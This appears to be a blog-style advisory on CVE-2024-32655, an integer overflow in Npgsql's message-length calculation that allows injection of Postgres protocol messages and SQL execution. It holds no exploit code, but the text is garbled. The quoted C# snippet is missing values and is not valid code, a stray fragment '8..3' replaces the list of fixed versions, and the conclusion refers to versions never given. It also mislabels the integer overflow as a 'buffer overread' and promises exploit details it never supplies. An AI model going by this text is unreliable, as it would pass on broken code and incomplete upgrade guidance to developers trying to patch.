CVE-2024-32655: Buffer Overread in Npgsql Leads to SQL Injection Vulnerability and Arbitrary Code Execution

Npgsql is a popular .NET data provider for PostgreSQL, a powerful and widely used object-relational database system. Recently, a critical vulnerability, CVE-2024-32655, has been discovered in Npgsql, which allows malicious users to execute arbitrary SQL statements and possibly gain unauthorized access to sensitive data or execute arbitrary code on the affected system. This post provides an in-depth analysis of the vulnerability, including code snippets, links to original references, and detailed exploit information.

Vulnerability Details

The vulnerability is present in the WriteBind() method of the Npgsql.Internal.NpgsqlConnector.FrontendMessages.cs source file. In this method, int variables are used to store the message length and the sum of parameter lengths. When the sum of the parameter lengths is too large, these variables overflow, leading to a buffer overread issue.

Here's the affected code snippet from NpgsqlConnector.FrontendMessages .cs

int messageLength = 4 + 2 + (buf.PreparedParams.Count + hydrationsMetadata.Count) * 2 + 2 + 4;
int totalParamLenSum = ;

foreach (var param in buf.PreparedParams)
{
    totalParamLenSum += param.Value.Length;
    messageLength += 4 + (param.Value.Length ==  ?  : 4 + param.Value.Length);
}

When the buffer overread occurs, Npgsql writes a message size that is too small while constructing a Postgres protocol message to be sent over the network to the database. As a result, when parsing the message, the database reads only a limited number of bytes and treats the remaining bytes in the message as new messages, though those bytes belong to the old message.

Attackers can exploit this vulnerability by injecting arbitrary Postgres protocol messages into the connection, leading to the execution of arbitrary SQL statements with the application's privileges. In the worst case, this could allow unauthorized access to sensitive data or code execution on the target system.

8..3

It is strongly recommended that all Npgsql users update their applications to one of these versions to mitigate the risk associated with CVE-2024-32655.

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32655
2. Npgsql Official Website: http://www.npgsql.org/
3. Npgsql GitHub Repository: https://github.com/npgsql/npgsql

Conclusion

CVE-2024-32655 is a critical vulnerability in Npgsql that could lead to arbitrary SQL statement execution and unauthorized access to sensitive data or code execution on the affected system. It is essential for Npgsql users to update their applications to one of the fixed versions mentioned above to avoid potential risks associated with this vulnerability.

Timeline

Published on: 05/14/2024 15:36:51 UTC
Last modified on: 06/04/2024 17:51:31 UTC